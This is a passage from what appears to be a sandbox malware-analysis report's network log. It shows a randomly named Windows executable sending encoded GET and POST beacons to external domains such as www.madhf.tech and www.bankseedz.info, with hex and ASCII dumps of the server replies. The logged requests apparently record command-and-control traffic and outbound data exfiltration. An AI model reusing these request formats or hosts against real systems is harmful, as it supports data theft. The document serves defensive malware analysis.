                                                                                                              Data Ascii: 6n=a+/R7g38sexo5+IVcJ08SVJy2PoDm231nl7hNhzUnYGvUondqrzpNkE22EHTXQgJAo2tj+8AaZWrun0fk8UwiYpJjeSIOEJXGQUi5lNL9QHBXKb2HG3jxe1NyZgldm2bqYYJmpxM51QmKTi655BKd+G8eKuOUaI8kHphSh7FdlRYnU3H3RQH3yQuYt9TIWkcw3QdVOdV0Z2le4znnWIXrzU5OMWYGlZq8//KiwLJyEhN3tnf6haV5ioOEDBr/QFaFulABX7nN1DihMJYJ/hM8Stu1l1XM9Afb7xHVqKwSyQAAH+UGFGVwGjpPLNtwS1SrW9VxHtvfvTBY6xNgcttLBL8xLG603fXodgUKC0DwuAKyXKBnl1vH6xhzAkozRC1vad5qFmgBZYVU3/Bfd29FEoTnHxEgnkxeiD4FTd0ZUuAAyW3r3NKWb1NQJq985AdAtZ3b8YZ3taJrt6eSw/1k7mdQg/NqE1+MXGKRhe19OEexUaIM+F4szf0rVP1U4b1nq3SPvxpstvsSLG8tZB1c2wYyVt5HSUFH0AGyCfblvJDIZkQJ0rVfCo6KXSZHsSbCVFMr058aAD+21eefJFCVLKbL3myS4bz92tvYA8CZUEFqggzf2ix2YWjnpDeJqnpHOD15OjC1ZzBvsPsPHGFVfPhZwu2M6DOgt9dRCYr59b5Mx7FYAbasHwpYICc0fEGcqUBQfr1O78vyaMKTNIP6vuZylhUNuaDBcs9+ST5Cpn9jXJVhqwLPHFZChDc/KvS7Zqh1EUBwLeRjNM2R8GmGPZ0MmoZq5MmMTpjCxH4iZc4wI9RjHEmJIBkx/xFWHn+FOCFOVp25ITUqK9D8oMCSgQY1hvk8moQsIhmwvGuI97dYycODx24RYQ+P+RxJXOzvKoqgKTqKaEU6cx8JqD9IzQT54+CtPRdxA1sVsw074fwVSCa0G8a9YX76+X+QabYI8OEdQ3XcK3Q95uJUYwGf4bNG3RH2/USig63DZ8Hy923fgfar [TRUNCATED]
                                                                                                              Jan 11, 2025 03:25:38.736265898 CET738INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Sat, 11 Jan 2025 02:25:38 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 564
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              16192.168.2.105154346.30.211.38806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:40.667407990 CET489OUTGET /uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA== HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.bankseedz.info
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:25:41.277942896 CET738INHTTP/1.1 404 Not Found
                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                              Date: Sat, 11 Jan 2025 02:25:41 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Content-Length: 564
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              17192.168.2.1051544103.224.182.242806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:46.897744894 CET741OUTPOST /3iym/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 191
                                                                                                              Connection: close
                                                                                                              Host: www.madhf.tech
                                                                                                              Origin: http://www.madhf.tech
                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 6b 48 4a 30 70 72 50 61 4b 7a 76 66 53 66 4e 46 42 50 30 72 4a 66 34 7a 6c 79 58 69 37 6f 77 4d 68 4f 31 6b 38 53 2f 42 49 79 63 6b 68 69 4c 66 31 66 52 34 63 66 36 64 45 68 68 79 71 61 7a 70 39 35 6c 34 69 6d 34 2b 62 33 69 2b 5a 74 6e 47 53 61 66 51 7a 59 6d 67 69 32 61 47 4e 4d 2f 64 4d 35 7a 66 72 4e 62 42 79 75 31 65 6a 6b 69 78 34 69 4b 33 64 52 69 79 48 4e 51 6a 78 2b 51 53 51 68 41 43 74 6d 66 38 6b 47 75 74 54 5a 30 55 70 33 52 74 6b 52 64 39 38 73 45 44 31 62 41 6e 62 5a 75 33 59 31 43 2b 79 74 57 57 42 43 35
                                                                                                              Data Ascii: 6n=shRImUNLCD6ykkHJ0prPaKzvfSfNFBP0rJf4zlyXi7owMhO1k8S/BIyckhiLf1fR4cf6dEhhyqazp95l4im4+b3i+ZtnGSafQzYmgi2aGNM/dM5zfrNbByu1ejkix4iK3dRiyHNQjx+QSQhACtmf8kGutTZ0Up3RtkRd98sED1bAnbZu3Y1C+ytWWBC5
                                                                                                              Jan 11, 2025 03:25:47.517066956 CET871INHTTP/1.1 200 OK
                                                                                                              date: Sat, 11 Jan 2025 02:25:47 GMT
                                                                                                              server: Apache
                                                                                                              set-cookie: __tad=1736562347.1667970; expires=Tue, 09-Jan-2035 02:25:47 GMT; Max-Age=315360000
                                                                                                              vary: Accept-Encoding
                                                                                                              content-encoding: gzip
                                                                                                              content-length: 576
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              connection: close
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              18192.168.2.1051545103.224.182.242806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:49.441230059 CET765OUTPOST /3iym/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 215
                                                                                                              Connection: close
                                                                                                              Host: www.madhf.tech
                                                                                                              Origin: http://www.madhf.tech
                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 77 77 4d 44 57 31 6e 2b 71 2f 55 49 79 63 73 42 6a 44 62 31 65 64 34 63 54 63 64 41 39 68 79 71 2b 7a 70 39 4a 6c 34 31 79 35 6b 72 33 6b 32 35 74 6c 4c 79 61 66 51 7a 59 6d 67 6d 66 53 47 4e 30 2f 63 38 4a 7a 65 4b 4e 59 4a 53 75 32 64 6a 6b 69 6e 34 6a 42 33 64 52 63 79 46 70 36 6a 7a 32 51 53 53 70 41 43 2f 4f 59 32 6b 47 6f 77 44 59 4c 51 34 65 4e 68 48 77 6b 38 74 77 51 56 56 36 6e 67 36 6b 70 6d 4a 55 56 74 46 78 59 59 48 33 54 5a 50 38 37 6f 69 54 6d 34 72 45 2f 7a 77 79 4a 33 57 72 46 71 51 3d 3d
                                                                                                              Data Ascii: 6n=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2HitwwMDW1n+q/UIycsBjDb1ed4cTcdA9hyq+zp9Jl41y5kr3k25tlLyafQzYmgmfSGN0/c8JzeKNYJSu2djkin4jB3dRcyFp6jz2QSSpAC/OY2kGowDYLQ4eNhHwk8twQVV6ng6kpmJUVtFxYYH3TZP87oiTm4rE/zwyJ3WrFqQ==
                                                                                                              Jan 11, 2025 03:25:50.025049925 CET871INHTTP/1.1 200 OK
                                                                                                              date: Sat, 11 Jan 2025 02:25:49 GMT
                                                                                                              server: Apache
                                                                                                              set-cookie: __tad=1736562349.4895586; expires=Tue, 09-Jan-2035 02:25:49 GMT; Max-Age=315360000
                                                                                                              vary: Accept-Encoding
                                                                                                              content-encoding: gzip
                                                                                                              content-length: 576
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              connection: close
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              19192.168.2.1051546103.224.182.242806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:51.983819962 CET1778OUTPOST /3iym/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                              Cache-Control: no-cache
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Content-Length: 1227
                                                                                                              Connection: close
                                                                                                              Host: www.madhf.tech
                                                                                                              Origin: http://www.madhf.tech
                                                                                                              Referer: http://www.madhf.tech/3iym/
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Data Raw: 36 6e 3d 73 68 52 49 6d 55 4e 4c 43 44 36 79 6b 45 33 4a 31 4b 7a 50 62 71 7a 73 52 79 66 4e 54 78 50 77 72 4f 58 34 7a 6b 32 48 69 74 34 77 50 77 65 31 6e 5a 47 2f 53 34 79 63 76 42 6a 41 62 31 66 48 34 63 37 59 64 48 31 78 79 6f 32 7a 6d 2b 78 6c 70 30 79 35 71 62 33 6b 30 35 74 6d 47 53 61 77 51 7a 4a 68 67 69 7a 53 47 4e 30 2f 63 2b 42 7a 4f 72 4e 59 45 79 75 31 65 6a 6b 6d 78 34 6a 70 33 64 59 6e 79 46 73 50 6a 41 4f 51 52 79 5a 41 42 4c 75 59 30 45 47 71 78 44 59 54 51 34 43 6b 68 48 39 62 38 74 55 36 56 57 71 6e 6c 2b 34 7a 31 4b 78 4c 34 44 56 33 66 78 53 34 53 70 59 37 76 68 76 6a 37 62 45 59 6c 42 6a 62 2b 30 69 57 36 59 38 4e 64 49 76 2f 61 70 48 5a 5a 41 2f 64 46 56 4f 2b 49 35 6c 4d 42 69 4d 6e 54 2f 39 56 46 47 4e 5a 42 53 67 54 51 69 46 67 48 4e 68 62 33 4d 4a 33 4b 6c 38 6b 42 33 68 5a 63 76 6d 4d 63 33 44 31 77 6e 65 2b 36 74 76 34 73 44 54 71 49 35 69 51 6d 75 30 68 56 55 6e 67 57 36 62 57 4a 6f 5a 48 55 79 46 72 57 6b 51 38 78 33 79 7a 62 61 32 75 44 76 35 30 6a 2f 47 72 2b 50 6b [TRUNCATED]
                                                                                                              Data Ascii: 6n=shRImUNLCD6ykE3J1KzPbqzsRyfNTxPwrOX4zk2Hit4wPwe1nZG/S4ycvBjAb1fH4c7YdH1xyo2zm+xlp0y5qb3k05tmGSawQzJhgizSGN0/c+BzOrNYEyu1ejkmx4jp3dYnyFsPjAOQRyZABLuY0EGqxDYTQ4CkhH9b8tU6VWqnl+4z1KxL4DV3fxS4SpY7vhvj7bEYlBjb+0iW6Y8NdIv/apHZZA/dFVO+I5lMBiMnT/9VFGNZBSgTQiFgHNhb3MJ3Kl8kB3hZcvmMc3D1wne+6tv4sDTqI5iQmu0hVUngW6bWJoZHUyFrWkQ8x3yzba2uDv50j/Gr+Pk7Ycbl7yd7CVcsXByUWzF+PNW9aHHbcYNKAuShJpWEBJguHxZW9YKWDUwNcDsVSCfY6yjddjfdtAjCqRUH0zjIQqCGAHe7DI8jp2b08SYM8rLYv0IXxHKRDXRDUS5sYqbc2e6aeC9zu2tROt5mn+P7q08piFIuIQzXOsXj20rfy3PjfSiNWlioqJ6wGqYsjpcWNPupUrkGq0LHJXkCBBL1qZI6mZBaFjubzVy3KK785YD8OVcXM+IE5OEBfL4V5QSYDr2zKZXUuIPqOYRKMXw9troXl5gy28ugFgiJLCVvYtqnpyRYa1/T6CIa4jQSsInijXPaQKoHTp2p3BDx53JNNS915ZrGfZqlcSdNv5bH2+N4k61GKvXf50QWqgrEmjp8GiHxDEO/I8VsAIiIWmHPVCMKXfjQr4XK0Uoe9+4caiRoQziJ6/REGWyYBRb00Y0WkMFdbXPh9ypytm0UnbhG8hUwilodv5uXQsEdhgFqfh+0wVVHx/2FNjLtxejtgiTAt/U8oYSiw9Re2LQFGqm/oGNQ0MMi+20w0QNxIMyA9SzmS9aSPrdI5OfsNk1S0FXLrAiRl/NxLcRrpfO6FQFjqY3ktWOvdpmF9fcOHy0lw+EabiUopKhh8KYTGZekjLxah25B+aHH+vEbou9mkDkvWkPYTgc4EU9tx [TRUNCATED]
                                                                                                              Jan 11, 2025 03:25:52.613168955 CET871INHTTP/1.1 200 OK
                                                                                                              date: Sat, 11 Jan 2025 02:25:52 GMT
                                                                                                              server: Apache
                                                                                                              set-cookie: __tad=1736562352.5933549; expires=Tue, 09-Jan-2035 02:25:52 GMT; Max-Age=315360000
                                                                                                              vary: Accept-Encoding
                                                                                                              content-encoding: gzip
                                                                                                              content-length: 576
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              connection: close
                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 [TRUNCATED]
                                                                                                              Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              20192.168.2.1051547103.224.182.242806148C:\Program Files (x86)\mwxjWpPgSruWwkcumWhwITKJspxwRvggDZHNgPIpgiwkjoSLohcDaFvmcascZmTmPcS\iBkWOgpZKSoi.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Jan 11, 2025 03:25:54.530111074 CET485OUTGET /3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-US
                                                                                                              Connection: close
                                                                                                              Host: www.madhf.tech
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                              Jan 11, 2025 03:25:55.127856016 CET1236INHTTP/1.1 200 OK
                                                                                                              date: Sat, 11 Jan 2025 02:25:55 GMT
                                                                                                              server: Apache
                                                                                                              set-cookie: __tad=1736562355.1631554; expires=Tue, 09-Jan-2035 02:25:55 GMT; Max-Age=315360000
                                                                                                              vary: Accept-Encoding
                                                                                                              content-length: 1460
                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                              connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 6d 61 64 68 66 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 66 69 6e 67 65 72 70 72 69 6e 74 2f 69 69 66 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 76 61 72 20 72 65 64 69 72 65 63 74 5f 6c 69 6e 6b 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 61 64 68 66 2e 74 65 63 68 2f 33 69 79 6d 2f 3f 36 6e 3d 68 6a 35 6f 6c 6b 73 63 46 6e 71 53 70 47 61 62 30 76 6e 33 4c 4e 48 72 42 6e 57 61 4f 52 65 6e 73 39 2f 6d 33 32 53 7a 36 74 34 46 42 54 47 73 74 74 57 70 56 70 43 42 71 53 4b 65 54 52 4c 6b 2f 66 61 42 59 55 52 57 38 5a 65 46 74 2f 4a 6e 6e 58 4c 75 6c 5a 43 38 68 61 59 53 54 68 4f 37 64 43 31 43 73 52 54 55 4d 59 30 51 52 62 78 53 4e 51 3d 3d 26 50 38 64 54 3d 47 76 77 38 50 72 6b 30 48 34 26 27 3b 0a 0a 2f 2f [TRUNCATED]
                                                                                                              Data Ascii: <html><head><title>madhf.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgcolor="#ffffff" text="#00
